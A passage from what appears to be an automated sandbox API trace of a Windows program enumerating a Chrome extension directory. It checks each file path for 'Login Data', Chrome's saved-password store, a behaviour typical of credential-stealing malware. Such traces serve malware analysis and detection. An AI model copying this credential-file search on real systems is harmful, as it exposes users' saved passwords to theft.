ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xc8d, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon_128.png", cAlternateFileName="")) returned 1 [0161.661] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0") returned 125 [0161.661] lstrlenW (lpString="\\") returned 1 [0161.661] GetProcessHeap () returned 0x8e0000 [0161.661] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xfe) returned 0x917dc8 [0161.661] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0" [0161.661] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\" [0161.661] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\") returned 126 [0161.661] lstrlenW (lpString="icon_128.png") returned 12 [0161.661] GetProcessHeap () returned 0x8e0000 [0161.661] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x925a88 [0161.661] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\" [0161.661] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\", lpString2="icon_128.png" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png" [0161.661] VirtualQuery (in: lpAddress=0x917dc8, lpBuffer=0x2deba0, dwLength=0x1c | out: lpBuffer=0x2deba0*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.661] GetProcessHeap () returned 0x8e0000 [0161.661] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x917dc8 | out: hHeap=0x8e0000) returned 1 [0161.661] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png", lpSrch="Login Data") returned 0x0 [0161.661] VirtualQuery (in: lpAddress=0x925a88, lpBuffer=0x2debac, dwLength=0x1c | out: lpBuffer=0x2debac*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.661] GetProcessHeap () returned 0x8e0000 [0161.661] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925a88 | out: hHeap=0x8e0000) returned 1 [0161.661] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86702750, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86833250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon_16.png", cAlternateFileName="")) returned 1 [0161.661] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0") returned 125 [0161.661] lstrlenW (lpString="\\") returned 1 [0161.661] GetProcessHeap () returned 0x8e0000 [0161.661] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xfe) returned 0x917dc8 [0161.661] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0" [0161.661] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\" [0161.661] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\") returned 126 [0161.661] lstrlenW (lpString="icon_16.png") returned 11 [0161.661] GetProcessHeap () returned 0x8e0000 [0161.661] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925a88 [0161.661] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\" [0161.661] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\", lpString2="icon_16.png" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png" [0161.661] VirtualQuery (in: lpAddress=0x917dc8, lpBuffer=0x2deba0, dwLength=0x1c | out: lpBuffer=0x2deba0*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.661] GetProcessHeap () returned 0x8e0000 [0161.661] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x917dc8 | out: hHeap=0x8e0000) returned 1 [0161.662] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png", lpSrch="Login Data") returned 0x0 [0161.662] VirtualQuery (in: lpAddress=0x925a88, lpBuffer=0x2debac, dwLength=0x1c | out: lpBuffer=0x2debac*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.662] GetProcessHeap () returned 0x8e0000 [0161.662] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925a88 | out: hHeap=0x8e0000) returned 1 [0161.662] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86702750, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86702750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfe051a00, ftLastWriteTime.dwHighDateTime=0x1d03f5d, nFileSizeHigh=0x0, nFileSizeLow=0x5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="main.html", cAlternateFileName="MAIN~1.HTM")) returned 1 [0161.662] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0") returned 125 [0161.662] lstrlenW (lpString="\\") returned 1 [0161.662] GetProcessHeap () returned 0x8e0000 [0161.662] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xfe) returned 0x917dc8 [0161.662] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0" [0161.662] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\" [0161.662] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\") returned 126 [0161.662] lstrlenW (lpString="main.html") returned 9 [0161.662] GetProcessHeap () returned 0x8e0000 [0161.662] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925a88 [0161.662] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\" [0161.662] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\", lpString2="main.html" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html" [0161.662] VirtualQuery (in: lpAddress=0x917dc8, lpBuffer=0x2deba0, dwLength=0x1c | out: lpBuffer=0x2deba0*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.662] GetProcessHeap () returned 0x8e0000 [0161.662] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x917dc8 | out: hHeap=0x8e0000) returned 1 [0161.662] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html", lpSrch="Login Data") returned 0x0 [0161.662] VirtualQuery (in: lpAddress=0x925a88, lpBuffer=0x2debac, dwLength=0x1c | out: lpBuffer=0x2debac*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.662] GetProcessHeap () returned 0x8e0000 [0161.662] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925a88 | out: hHeap=0x8e0000) returned 1 [0161.662] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86702750, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86702750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfe051a00, ftLastWriteTime.dwHighDateTime=0x1d03f5d, nFileSizeHigh=0x0, nFileSizeLow=0x5b, dwReserved0=0x0, dwReserved1=0x0, cFileName="main.js", cAlternateFileName="")) returned 1 [0161.662] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0") returned 125 [0161.662] lstrlenW (lpString="\\") returned 1 [0161.662] GetProcessHeap () returned 0x8e0000 [0161.662] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xfe) returned 0x917dc8 [0161.662] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0" [0161.662] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\" [0161.662] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\") returned 126 [0161.662] lstrlenW (lpString="main.js") returned 7 [0161.662] GetProcessHeap () returned 0x8e0000 [0161.662] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x10c) returned 0x925a88 [0161.662] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\" [0161.663] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\", lpString2="main.js" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js" [0161.663] VirtualQuery (in: lpAddress=0x917dc8, lpBuffer=0x2deba0, dwLength=0x1c | out: lpBuffer=0x2deba0*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.663] GetProcessHeap () returned 0x8e0000 [0161.663] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x917dc8 | out: hHeap=0x8e0000) returned 1 [0161.663] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js", lpSrch="Login Data") returned 0x0 [0161.663] VirtualQuery (in: lpAddress=0x925a88, lpBuffer=0x2debac, dwLength=0x1c | out: lpBuffer=0x2debac*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.663] GetProcessHeap () returned 0x8e0000 [0161.663] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925a88 | out: hHeap=0x8e0000) returned 1 [0161.663] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86727140, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x2d5, dwReserved0=0x0, dwReserved1=0x0, cFileName="manifest.json", cAlternateFileName="MANIFE~1.JSO")) returned 1 [0161.663] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0") returned 125 [0161.663] lstrlenW (lpString="\\") returned 1 [0161.663] GetProcessHeap () returned 0x8e0000 [0161.663] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xfe) returned 0x917dc8 [0161.663] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0" [0161.663] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\" [0161.663] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\") returned 126 [0161.663] lstrlenW (lpString="manifest.json") returned 13 [0161.663] GetProcessHeap () returned 0x8e0000 [0161.663] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x118) returned 0x925a88 [0161.663] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\" [0161.663] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\", lpString2="manifest.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json" [0161.663] VirtualQuery (in: lpAddress=0x917dc8, lpBuffer=0x2deba0, dwLength=0x1c | out: lpBuffer=0x2deba0*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.663] GetProcessHeap () returned 0x8e0000 [0161.663] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x917dc8 | out: hHeap=0x8e0000) returned 1 [0161.663] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json", lpSrch="Login Data") returned 0x0 [0161.663] VirtualQuery (in: lpAddress=0x925a88, lpBuffer=0x2debac, dwLength=0x1c | out: lpBuffer=0x2debac*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.663] GetProcessHeap () returned 0x8e0000 [0161.663] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925a88 | out: hHeap=0x8e0000) returned 1 [0161.663] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86702750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86702750, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_locales", cAlternateFileName="")) returned 1 [0161.663] lstrcmpiW (lpString1="_locales", lpString2=".") returned 1 [0161.663] lstrcmpiW (lpString1="_locales", lpString2="..") returned 1 [0161.663] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0") returned 125 [0161.663] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0") returned 125 [0161.663] lstrlenW (lpString="\\") returned 1 [0161.663] GetProcessHeap () returned 0x8e0000 [0161.664] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xfe) returned 0x917dc8 [0161.664] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0" [0161.664] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\" [0161.664] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\") returned 126 [0161.664] lstrlenW (lpString="_locales") returned 8 [0161.664] GetProcessHeap () returned 0x8e0000 [0161.664] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x10e) returned 0x925a88 [0161.664] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\" [0161.664] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\", lpString2="_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") 